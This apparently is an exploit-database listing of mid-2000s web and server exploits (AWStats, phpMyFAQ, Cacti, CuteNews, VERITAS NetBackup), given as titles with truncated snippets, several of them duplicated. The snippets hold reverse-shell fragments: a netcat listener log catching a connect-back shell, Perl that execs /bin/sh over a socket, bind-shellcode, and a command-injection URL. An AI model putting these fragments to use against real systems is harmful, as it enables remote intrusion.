WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

Exploit for unknown platform in category web applications ========================================================= WordPress = 2.0.2 cache Remote Shell Injection Exploit ========================================================= !/usr/bin/php -q -d shortopentag=on ? echo...

AWStats &lt;= 6.5 (migrate) Remote Shell Command Injection Exploit

No description provided by source. !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org...

AWStats 6.5 - &#039;migrate&#039; Remote Shell Command Injection

!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...

AWStats 6.5 - migrate Remote Shell Command Injection

AWStats 6.5 - migrate Remote Shell Command Injection !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from...

AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit

Exploit for cgi platform in category web applications =============================================================== AWStats &CLIENT";openSTDOUT,"&CLIENT";openSTDERR,"&CLIENT";ifforkexec "/bin/sh"; exit0; ;''; class rbawstatsMigrate: url = '' user = '' password = '' auth = False chost =False...

FCKEditor 2.0 <= 2.2 (connector.php) Remote Shell Upload Exploit

Exploit for unknown platform in category web applications ================================================================ FCKEditor 2.0 a short explaination: if a user cam call directly http://target/path/editor/filemanager/browser/default/connectors/php/connector.php he can upload malicious...

CuteNews &lt;= 1.4.1 (categories.mdu) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...

VERITAS NetBackup Agent Detection

The remote host is running the VERITAS NetBackup Java Console service. This service is used by the NetBackup Java Console GUI to manage the backup server. A user, authorized to connect to this service, can use it as a remote shell with system privileges by sending 'commandEXECLIST' messages...

dwhttpd format string

The remote web server is vulnerable to a format string attack. SPDX-FileCopyrightText: 2002 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Helix RealServer Buffer Overrun

RealServer 8.0 and earlier and Helix Server 9.0 is vulnerable to a buffer overflow vulnerability. SPDX-FileCopyrightText: 2003 Montgomery County Maryland Government Security Team Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right...

snmpXdmid overflow

The remote RPC service 100249 snmpXdmid is vulnerable to a heap overflow which allows any user to obtain a root shell on this host. SPDX-FileCopyrightText: 2001 Intranode Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders...

NNTP password overflow

The scanner was able to crash the remote NNTP server by sending a too long password. This flaw is probably a buffer overflow and might be exploitable to run arbitrary code on this machine. SPDX-FileCopyrightText: 2005 Michel Arboi Some text descriptions might be excerpted from a referenced source...

Veritas NetBackup 6.0 (OSX) - &#039;bpjava-msvc&#039; Remote Command Execution

!/usr/bin/perl VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit johnhatdigitalmunitiondotcom bug found by kflistsatdigitalmunitiondotcom http://www.digitalmunition.com/ use POSIX; use IO::Socket; use IO::Select; my $shellcode = / OSX BINDSHELLCODE PORT=5557 NO-0x0 /...

RealPlayer/Helix Player Remote Format String Exploit (linux)

Exploit for linux platform in category remote exploits ============================================================ RealPlayer/Helix Player Remote Format String Exploit linux ============================================================ / $ An open security advisory 13 - RealPlayer and Helix Playe...

phpMyFAQ &lt;= 1.5.1 (User-Agent) Remote Shell Injection Exploit

No description provided by source. ?php 17.34 22/09/2005 phpmyfaqxpl.php PhpMyFaq 1.5.1 possibly prior versions shell inject by rgod site: http://rgod.altervista.org make these changes in your php.ini if you have troubles to launch this script: allowcalltimepassreference = on registerglobals = on...

phpMyFAQ <= 1.5.1 (User-Agent) Remote Shell Injection Exploit

Exploit for unknown platform in category web applications ============================================================= phpMyFAQ = 1.5.1 User-Agent Remote Shell Injection Exploit ============================================================= ?php 17.34 22/09/2005 phpmyfaqxpl.php PhpMyFaq 1.5.1...

phpMyFAQ 1.5.1 - &#039;User-Agent&#039; Remote Shell Injection

?php 17.34 22/09/2005 phpmyfaqxpl.php PhpMyFaq 1.5.1 possibly prior versions shell inject by rgod site: http://rgod.altervista.org make these changes in your php.ini if you have troubles to launch this script: allowcalltimepassreference = on registerglobals = on usage: launch this script from...

phpMyFAQ 1.5.1 - User-Agent Remote Shell Injection

phpMyFAQ 1.5.1 - User-Agent Remote Shell Injection ?php 17.34 22/09/2005 phpmyfaqxpl.php PhpMyFaq 1.5.1 possibly prior versions shell inject by rgod site: http://rgod.altervista.org make these changes in your php.ini if you have troubles to launch this script: allowcalltimepassreference = on...

Cacti 0.8.6d - Remote Command Execution

Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: download the last version...

[Full-disclosure] Portcullis Security Advisory 05-013 - VoIP - Asterisk Stack Overflow

Portcullis Security Advisory Wade Alcorn [email protected] - www.portcullis-security.com/advisory/advisory-05-013.txt [email protected] - www.bindshell.net/voip/advisory-05-013.txt Vulnerable System: This vulnerability affects Asterisk 1.0.7 and the development Asterisk branch known as...